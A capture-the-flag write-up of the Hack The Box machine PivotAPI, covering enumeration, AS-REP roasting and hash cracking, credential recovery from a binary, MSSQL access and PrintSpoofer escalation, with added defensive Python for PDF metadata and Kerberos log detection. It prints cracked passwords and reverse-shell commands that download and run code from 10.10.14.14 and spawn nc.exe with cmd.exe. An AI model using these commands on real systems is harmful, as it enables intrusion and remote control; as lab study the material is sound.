Basic Information

Port Scan

$ nmap -sC -sV -Pn 10.10.10.240

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-13 10:17 CST
Nmap scan report for 10.10.10.240
Host is up (0.069s latency).
Not shown: 986 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-19-21 03:06PM 103106 10.1.1.414.6453.pdf
| 02-19-21 03:06PM 656029 28475-linux-stack-based-buffer-overflows.pdf
| 02-19-21 12:55PM 1802642 BHUSA09-McDonald-WindowsHeap-PAPER.pdf
| 02-19-21 03:06PM 1018160 ExploitingSoftware-Ch07.pdf
| 08-08-20 01:18PM 219091 notes1.pdf
| 08-08-20 01:34PM 279445 notes2.pdf
| 08-08-20 01:41PM 105 README.txt
|_02-19-21 03:06PM 1301120 RHUL-MA-2009-06.pdf
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 3072 fa:19:bb:8d:b6:b6:fb:97:7e:17:80:f5:df:fd:7f:d2 (RSA)
| 256 44:d0:8b:cc:0a:4e:cd:2b:de:e8:3a:6e:ae:65:dc:10 (ECDSA)
|_ 256 93:bd:b6:e2:36:ce:72:45:6c:1d:46:60:dd:08:6a:44 (ED25519)
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-05-13 02:18:50Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: LicorDeBellota.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: LICORDEBELLOTA
| NetBIOS_Domain_Name: LICORDEBELLOTA
| NetBIOS_Computer_Name: PIVOTAPI
| DNS_Domain_Name: LicorDeBellota.htb
| DNS_Computer_Name: PivotAPI.LicorDeBellota.htb
| DNS_Tree_Name: LicorDeBellota.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-05-13T02:14:57
|_Not valid after: 2051-05-13T02:14:57
|_ssl-date: 2021-05-13T02:19:40+00:00; 0s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: LicorDeBellota.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: PIVOTAPI; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| ms-sql-info:
| 10.10.10.240:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-05-13T02:19:03
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.85 seconds

21 ftp

FTP anonymous login:

username

Inspecting the metadata of the PDF files on the FTP share yields a few usernames:

saif
byron gronseth
alex
Kaorz
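The metadata check described above, as an added example that is not part of the original writeup: a small Python routine that pulls the classic Info-dictionary fields (Author, Creator, Producer, Title) out of a PDF, the same fields that leak usernames from published documents. The embedded PDF and its values are constructed; the routine reads only the Info dictionary, not XMP metadata.

```python
import re

# Constructed minimal PDF standing in for the notes/paper PDFs on the FTP share.
# The author and tool values are invented; the real files' metadata is not reproduced.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
3 0 obj << /Title (notes1) /Author (byron gronseth) /Creator (Microsoft Word)
           /Producer <4D6963726F736F667420576F7264> >> endobj
trailer << /Root 1 0 R /Info 3 0 R >>
%%EOF
"""

# Info-dictionary keys that name a person or the tool chain that produced the file.
IDENTITY_KEYS = (b"Author", b"Creator", b"Producer", b"Title")


def _decode(value: bytes) -> str:
    """Decode a PDF string object, (literal) or <hex>; UTF-16BE when it carries a BOM."""
    if value.startswith(b"<"):
        raw = bytes.fromhex(value[1:-1].decode("ascii"))
    else:
        raw = value[1:-1].replace(b"\\(", b"(").replace(b"\\)", b")")
    if raw.startswith(b"\xfe\xff"):
        return raw[2:].decode("utf-16-be")
    return raw.decode("latin-1")


def pdf_info(data: bytes) -> dict:
    """Return the Info-dictionary entries listed in IDENTITY_KEYS, decoded to str.

    Follows the /Info reference in the trailer to its object and reads literal
    and hex strings; nested parentheses inside literals are not handled."""
    ref = re.search(rb"/Info\s+(\d+)\s+\d+\s+R", data)
    if not ref:
        return {}
    obj = re.search(rb"\n" + ref.group(1) + rb"\s+0\s+obj\s*<<(.*?)>>\s*endobj", data, re.S)
    if not obj:
        return {}
    found = {}
    for key in IDENTITY_KEYS:
        m = re.search(rb"/" + key + rb"\s*(\([^)]*\)|<[0-9A-Fa-f\s]*>)", obj.group(1))
        if m:
            found[key.decode()] = _decode(m.group(1))
    return found


def leaks_identity(data: bytes) -> bool:
    """True when Author is populated, the field the username list above came from."""
    return bool(pdf_info(data).get("Author", "").strip())
```

Run it over a directory of documents before they are published to a share or website; anything where leaks_identity() is true should have its Info dictionary stripped.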

ASREPROAST

The scan results show this is a domain environment, so we try AS-REP roasting with the collected usernames and obtain the krb5asrep hash of the Kaorz user:

python3 ~/Tools/impacket/examples/GetNPUsers.py LicorDeBellota.htb/ -usersfile users.txt -format john  -dc-ip 10.10.10.240

$krb5asrep$Kaorz@LICORDEBELLOTA.HTB:a9391a27ab311b826fdf715429495980$8e1ae7257257c8a5c0c67fa8ed6a639f260732e4a818298ba6d125a7a88f1ffe6f8f5db78e492f29530e97cfe2598fe1bf5cf23a0864ed38b1c8cc242df4fbd62e61baa2bd1bda681741c2341405693150036560e316cab6de8e1a96fb4c3374e33e2734db8aec7ea25938fa16e3ff42f9c71bfe67d543a40f6d8145384e259b83f8c4e41aeaeb5b72035140ac9f60411cff2c3bf85603729109cd67f7ca8769f1471f30936b2eb8270785cd1ccc3eeaa6806308a22e79aff5f638ba9dbe614a954ebe82a78f907721a5ab22a30605e6cc50192b02d5fd3de076a657a8bff3f6c636e37b4bc69ca40e8e98c3d0544b42321f1cde5993e68d
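The roast above works because the Kaorz account has Kerberos pre-authentication disabled; the fix on the domain side is to re-enable it on that account. As an added illustration from the detection side (not part of the original writeup), the Python below scans constructed Security event 4768 records for the footprint this step leaves on the domain controller; only the 10.10.14.14 address is taken from the writeup, every other value is invented.

```python
import re
from collections import defaultdict

# Constructed sample of Security event 4768 (Kerberos TGT request) records,
# flattened to one key=value line each. 10.10.14.14 is the attacking host from
# the writeup; every other value here is invented for the illustration.
SAMPLE_4768 = """\
TargetUserName=Kaorz TargetDomainName=LICORDEBELLOTA.HTB IpAddress=::ffff:10.10.14.14 TicketEncryptionType=0x17 PreAuthType=0 Status=0x0
TargetUserName=alex TargetDomainName=LICORDEBELLOTA.HTB IpAddress=::ffff:10.10.14.14 TicketEncryptionType=0xffffffff PreAuthType=- Status=0x19
TargetUserName=saif TargetDomainName=LICORDEBELLOTA.HTB IpAddress=::ffff:10.10.14.14 TicketEncryptionType=0xffffffff PreAuthType=- Status=0x6
TargetUserName=PIVOTAPI$ TargetDomainName=LICORDEBELLOTA.HTB IpAddress=::ffff:10.10.10.240 TicketEncryptionType=0x12 PreAuthType=2 Status=0x0
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_4768(text):
    """Turn each non-empty line into a dict of its key=value fields."""
    return [dict(FIELD_RE.findall(line)) for line in text.splitlines() if line.strip()]


def client_ip(event):
    """Drop the IPv4-mapped prefix Windows logs in front of IPv4 clients."""
    ip = event.get("IpAddress", "")
    return ip[7:] if ip.startswith("::ffff:") else ip


def asrep_roast_hits(events):
    """Successful TGT requests sent with no pre-authentication (PreAuthType 0)
    and answered with an RC4-encrypted reply (0x17): the footprint of the
    GetNPUsers.py run above. Returns (account, client) pairs."""
    return [
        (e["TargetUserName"], client_ip(e))
        for e in events
        if e.get("PreAuthType") == "0"
        and e.get("TicketEncryptionType", "").lower() == "0x17"
        and e.get("Status") == "0x0"
    ]


def user_enumeration(events, min_accounts=3):
    """Clients that requested TGTs for many distinct accounts, successful or not;
    a sweep driven by a users.txt like the one above looks like this."""
    seen = defaultdict(set)
    for e in events:
        seen[client_ip(e)].add(e["TargetUserName"])
    return {ip: len(users) for ip, users in seen.items() if len(users) >= min_accounts}


if __name__ == "__main__":
    evs = parse_4768(SAMPLE_4768)
    print("AS-REP roast hits:", asrep_roast_hits(evs))
    print("enumerating clients:", user_enumeration(evs))
```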

hash crack

Cracking it yields the Kaorz user's password, Roper4155:

➜  Desktop sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
[sudo] password for miao:
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Roper4155 ($krb5asrep$Kaorz@LICORDEBELLOTA.HTB)
1g 0:00:00:16 DONE (2021-05-12 19:22) 0.06157g/s 657024p/s 657024c/s 657024C/s Roryarthur..Ronald8
Use the "--show" option to display all of the cracked passwords reliably
Session completed

SMB

The recovered password does not work for SSH directly, but it does work for SMB:

NETLOGON

There are several files under Helpdesk in the NETLOGON share; download them for analysis:

EXE analysis

With Procmon or a similar tool you can see Restart-OracleService.exe invoking cmd; CMDWatcher shows the command:

Roughly, it drops a restart-service.exe, runs it, and then deletes it:

restart-service.exe

So just edit the bat contents so the exe file is left behind for analysis:

Since it is used to restart a service, it must contain credentials; from the API calls we recover the oracle username and password format:

svc_oracle
#oracle_s3rV1c3!2010

mssql

There are also two msg files, which say Oracle dates from 2010 and was replaced by MSSQL in 2020. The scan already showed an MSSQL service, so following the same format we get the MSSQL credentials:

sa
#mssql_s3rV1c3!2020

mssql

MDUT is awesome:

mssql shell

priv

We have SeImpersonatePrivilege:

reverse shell

None of these shells connect back:

powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.14:7777/Invoke-PowerShellTcp.ps1\");"

cmd /c powershell iwr http://10.10.14.14:7777/nc.exe -outf \windows\system32\spool\drivers\color\cute.exe
cmd /c start \windows\system32\spool\drivers\color\nc.exe 10.10.14.14 4444 -e cmd.exe

Privilege escalation & flags

Since we have SeImpersonatePrivilege, PrintSpoofer can be used to escalate privileges:

The paths are not the usual ones; just confirm them from the Users directory and the net user output:

C:/Windows/System32/spool/drivers/color/PrintSpoofer.exe -i -c "powershell -c type C:\Users\3v4Si0N\Desktop\user.txt"
C:/Windows/System32/spool/drivers/color/PrintSpoofer.exe -i -c "powershell -c type C:\Users\cybervaca\Desktop\root.txt"

References